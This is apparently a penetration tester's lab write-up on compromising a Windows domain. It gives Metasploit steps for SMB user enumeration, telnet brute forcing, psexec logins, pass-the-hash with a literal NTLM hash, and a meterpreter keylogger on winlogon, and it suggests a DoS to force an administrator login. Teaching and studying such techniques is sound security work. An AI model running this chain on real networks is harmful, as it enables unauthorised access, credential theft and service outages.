So guys, i had promised to give this review of the last lab we set and this scenario was picked from several pentests i had done on banks back here in KE. So this vulnerability happens due administrators ignorance when joining workstations to a domain controller, where by they use their credentials to troubleshoot, and then happen to never change their passwords, or just use that administrator password as default and result to sharing it. See the scenario as shown on the diagram on the left.
So as you can see, this time the attacker is inhouse, and he is after one machine which he finds a vulnerability and wants to gain access to and try to own the domain controller. So he will scan the whole network and find a system that is vulnerable, he should do it stealthily to make sure no IDS is triggered.
And here we go, the workstation is 192.168.0.231 with windows XP Service pack 3, fully patched, as seen below, and a DC server 192.168.0.230
So now from nmap we actually know what the Box is running well, and also the services reachable, and we do an rdesktop on it we should see more, especially on the domain name.
So we also saw that we hard 445 open which is for smb, maybe we can use an nmap script against it and see if we can enumerate the users, as below.
So now we have several users to work with,
Host script results:
| DELIVERY10\admin (RID: 1002)
| DELIVERY10\Administrator (RID: 500)
| DELIVERY10\alex (RID: 1004)
| DELIVERY10\ASPNET (RID: 1001)
| DELIVERY10\DELIVERY1$ (RID: 1108)
| DELIVERY10\gitau (RID: 1003)
| DELIVERY10\Guest (RID: 501)
| DELIVERY10\harris (RID: 1112)
| DELIVERY10\krbtgt (RID: 502)
| DELIVERY10\suzanne (RID: 1111)
| DELIVERY10\WIN-JWK9S00BSFY$ (RID: 1005)
| DELIVERY1\admin (RID: 1006)
| DELIVERY1\Administrator (RID: 500)
| DELIVERY1\belinda (RID: 1009)
| DELIVERY1\betty (RID: 1010)
| DELIVERY1\dic (RID: 1012)
| DELIVERY1\Guest (RID: 501)
| DELIVERY1\HelpAssistant (RID: 1000)
| DELIVERY1\ismail (RID: 1011)
| DELIVERY1\IUSR_DELIVERY1 (RID: 1004)
| DELIVERY1\IWAM_DELIVERY1 (RID: 1005)
| DELIVERY1\james (RID: 1013)
| DELIVERY1\josephine (RID: 1003)
| DELIVERY1\luther (RID: 1008)
| DELIVERY1\mike (RID: 1007)
| DELIVERY1\shirley (RID: 1014)
|_ DELIVERY1\SUPPORT_388945a0 (RID: 1002
but to test this, we might need to know about the SMB Service running here. By now we know the users, we know the service pack, we know the language and the domain name.
So the next issue is to test vulnerabilities on these services and also try see if telnet service can be misused if some of the users has a simple password. So from the users, we will make a password list and a user list which should be exactly the same as below.
You can vim or vi or use gedit as above, to do this.
We will use the metasploit module, telnet_login to try brute this box, with the simple passwords, as below.
And we go ahead and do "run"
And we get two logins which we use to gain shell.
msf exploit(psexec) > set RHOST 192.168.0.231
RHOST => 192.168.0.231
msf exploit(psexec) > set SMBPass admin
SMBPass => admin
msf exploit(psexec) > set SMBUser admin
SMBUser => admin
msf exploit(psexec) > set TARGET 0
TARGET =>; 0
msf exploit(psexec) > set SMBDomain DELIVERY1
SMBDomain => DELIVERY1
msf exploit(psexec) > set LPORT 1234
LPORT => 1234
And we will be using meterpreter,
Our real target here is the domain server, which is on 192.168.0.230. By now we have the hashes for the administrator and we should copy it somewhere for some use later
Alright, lets audit the domain server and see what it holds
Nmap scan report for 192.168.0.230
Host is up (0.0013s latency).
Not shown: 983 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.0.6002
88/tcp open kerberos-sec Microsoft Windows kerberos-sec
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap
3269/tcp open tcpwrapped
3389/tcp open microsoft-rdp Microsoft Terminal Service
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
49158/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49163/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows
Alright, we still got port 445 enabled, time to pass the hash.
msf exploit(psexec) > set RHOST 192.168.0.230
RHOST => 192.168.0.230
msf exploit(psexec) > set SMBDomain DELIVERY10
SMBDomain => DELIVERY10
msf exploit(psexec) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:29ab93251f7e1bdc4a5449e8d68011f6
SMBPass => aad3b435b51404eeaad3b435b51404ee:29ab93251f7e1bdc4a5449e8d68011f6
So the objective of this test was to gain access to administrators passwords, and so we will use meterpreter fuctionality to just do that.
Here we go, first we need to gain control of the winlogin process and migrate to it and then start the keylogger and see if we can have some login sooner. Sometimes in real pentest it might take time, so what happens is you can try to cause havoc, in a DOS attack on one service, which will make the administrator login to the server.
Okey, now we can monitor who logs in, we can start the keylogger and get the password when the administrator logs in.